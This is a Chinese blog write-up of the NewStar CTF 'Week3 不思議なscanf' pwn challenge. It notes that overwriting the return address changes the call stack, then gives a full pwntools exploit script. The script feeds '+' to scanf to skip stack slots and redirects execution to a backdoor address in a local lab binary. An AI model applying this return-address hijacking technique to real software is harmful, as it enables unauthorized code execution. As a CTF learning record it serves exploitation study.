Week3_不思議なscanf

Week3_不思議なscanf

安全策略

{1216F1B5-754A-4807-AE68-EB3744EEA591}

修改了返回地址,调用堆栈的情况也发生了变化

Snipaste_2024-12-01_19-51-20

我下载的附件有点问题可能,试用官方wp时,出现这种情况,调用堆栈不对也能打到后门

{E9C9A978-3D36-4F00-A78E-5A1637686EAD}

问了师傅们,出题人Chovy师傅给了原本的函数图

A46EEE51CFF7EEC391BE78F5E178D674

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
from pwn import *
from ctypes import *
context(arch = "amd64",log_level = "debug",os='linux')
#p = remote('192.168.65.1',6666)
p = process('./pwn')
#ELFpath = './pwn'
#p=process(['./ld-linux-x86-64.so.2', ELFpath], env={"LD_PRELOAD":'./libc.so.6'})
#elf = ELF('./pwn')
#libc = ELF('./libc.so.6')
def s(s): return p.send(s)
def sa(s, n): return p.sendafter(s, n)
def sl(s): return p.sendline(s)
def sla(s, n): return p.sendlineafter(s, n)
def r(n): return p.recv(n)
def ru(s): return  p.recvuntil(s)
def ti(): return p.interactive()
def pp(a): print(a)
def pr(): print(p.recv())
def ph(a): print(hex(a))
def get32(): return u64(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
def get64(): return u32(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
def getlibc(a): return libc_base + libc.sym[a]
def bug():
    pause()
    gdb.attach(p)

backdoor = 0x401281
for _ in range(10):
    sla('ます!',b'+')
ru('ます!')
sl(str(0x401261))#说明绕过mov rbp,rsp的栈对齐就可以了
#0x401240|41|61|62
ru('ます!')
sl(str(0))
pause()
gdb.attach(p)
#sl(b'0')
for _ in range(4):
    sla('ます!',b'+')
ti()
NewStar
#每天一题的比赛复盘 #fmt
Week3_不思議なscanf
http://sh1j1.github.io/2024/12/01/Week3-不思議なscanf/
作者
sh1j1
发布于
2024年12月1日
许可协议